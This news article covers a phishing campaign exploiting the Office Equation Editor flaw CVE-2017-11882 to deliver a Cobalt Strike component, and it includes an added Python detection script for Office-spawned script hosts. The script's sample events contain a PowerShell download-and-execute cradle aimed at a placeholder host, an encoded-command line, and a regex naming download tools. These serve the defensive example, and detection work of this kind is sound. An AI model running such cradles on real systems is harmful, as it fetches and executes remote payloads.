What is Cobalt malware? Hackers exploit 17-year-old Microsoft Office flaw to hijack PCs
"Threat actors are always on the lookout for vulnerabilities to exploit and use them for malware campaigns like this," Fortinet researchers said.
Security researchers have found that hackers are exploiting a Microsoft Office vulnerability that existed for 17 years to distribute malware capable of hijacking an infected system. Researchers at Fortinet said threat actors have been using the CVE-2017-11882 exploit, a remote code execution vulnerability in Microsoft Office that has been active for nearly a decade but was only recently disclosed and patched by the company earlier in November.
The vulnerability can be exploited by attackers to run arbitrary code and potentially take full control of the system to execute commands and extract files.
"As we have repeatedly seen, not long after its disclosure threat actors were quick to take advantage of this vulnerability to deliver a malware using a component from a well-known penetration testing tool, Cobalt Strike," the researchers said.
This malware campaign targets Russian speakers with a spam email that claims to be a notification from Visa about rule changes for the payWave service in Russia. The email carries a password-protected RTF document, with the password needed to open it supplied in the email body.
"This is to prevent auto-analysis systems from extracting the malicious files for sandboxing and detection," Fortinet researchers Jasper Manual and Joie Salvio wrote. "Since a copy of the malicious document is out in the open... it's possible that this is only to trick the user into thinking that securities are in place, which is something one would expect in an email from a widely used financial service."
Once the document is opened, the user is met with a plain document with the words "Enable Editing". Meanwhile, a PowerShell script runs in the background to download the Cobalt Strike client and take control of the infected system.
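The chain described above (an Office document opens, and a script host is spawned in the background to fetch a second stage) leaves a characteristic process-creation trail that endpoint telemetry can catch even when the lure document itself slips past attachment scanning. The following is an added detection example written for this article; it is not code from Fortinet or from the campaign. It runs over a few constructed process-creation events and flags an Office parent (including EQNEDT32.EXE, the Equation Editor component that CVE-2017-11882 affects) launching a script host, raising the severity when the command line carries download or encoded-command indicators. Field names, paths and command lines are all assumptions chosen for the example.

```python
import re

# Constructed sample process-creation events (illustrative only, not from
# the Fortinet report). Each event: parent image, child image, command line.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/stage2')\""},
    {"parent": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -enc aQBlAHgA"},
    {"parent": r"C:\Windows\explorer.exe",          # benign: user-launched shell
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem"},
    {"parent": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe",           # benign: print spooler helper
     "cmdline": "splwow64.exe 12288"},
]

# Office processes that should not normally spawn script hosts.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}
# Script hosts commonly used as the first stage after a document exploit.
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Command-line indicators of a download cradle or obfuscated command.
DOWNLOAD_PATTERN = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bwget\b|\bcurl\b"
    r"|-enc\b|-encodedcommand|bitsadmin|https?://",
    re.IGNORECASE,
)


def basename(path):
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return an alert dict for an Office-to-script-host spawn, else None."""
    parent = basename(event["parent"])
    child = basename(event["image"])
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    # An Office parent launching a script host is suspicious on its own;
    # a download cradle or encoded command in the arguments makes it high.
    severity = "high" if DOWNLOAD_PATTERN.search(event["cmdline"]) else "medium"
    return {"parent": parent, "child": child, "severity": severity,
            "cmdline": event["cmdline"]}


def scan(events):
    """Run classify() over a list of events and return only the alerts."""
    return [alert for alert in map(classify, events) if alert is not None]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"[{alert['severity']}] {alert['parent']} -> {alert['child']}: "
              f"{alert['cmdline']}")
```

The rule deliberately keys on the parent/child relationship rather than on the document or the payload URL, so it still fires when the lure, the password trick and the second-stage hosting change; the command-line pattern only adjusts severity. In a real deployment the event source would be Sysmon or EDR process-creation telemetry rather than the inline list.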
Hackers can then "control the victim's system and initiate lateral movement procedures in the network by executing a wide array of commands", the researchers said.
"Threat actors are always on the lookout for vulnerabilities to exploit and use them for malware campaigns like this," the Fortinet researchers wrote. "This goes both for new and old vulnerabilities, whether they have been published or not. We frequently see malware campaigns that exploit vulnerabilities that have been patched for months or even years.
"This may have come from an assumption that there are still a significant number of users out there that don't take software updates seriously, which sadly, is far too often the case."
Microsoft Office users have been advised to download the patch for the CVE-2017-11882 vulnerability and update their systems immediately.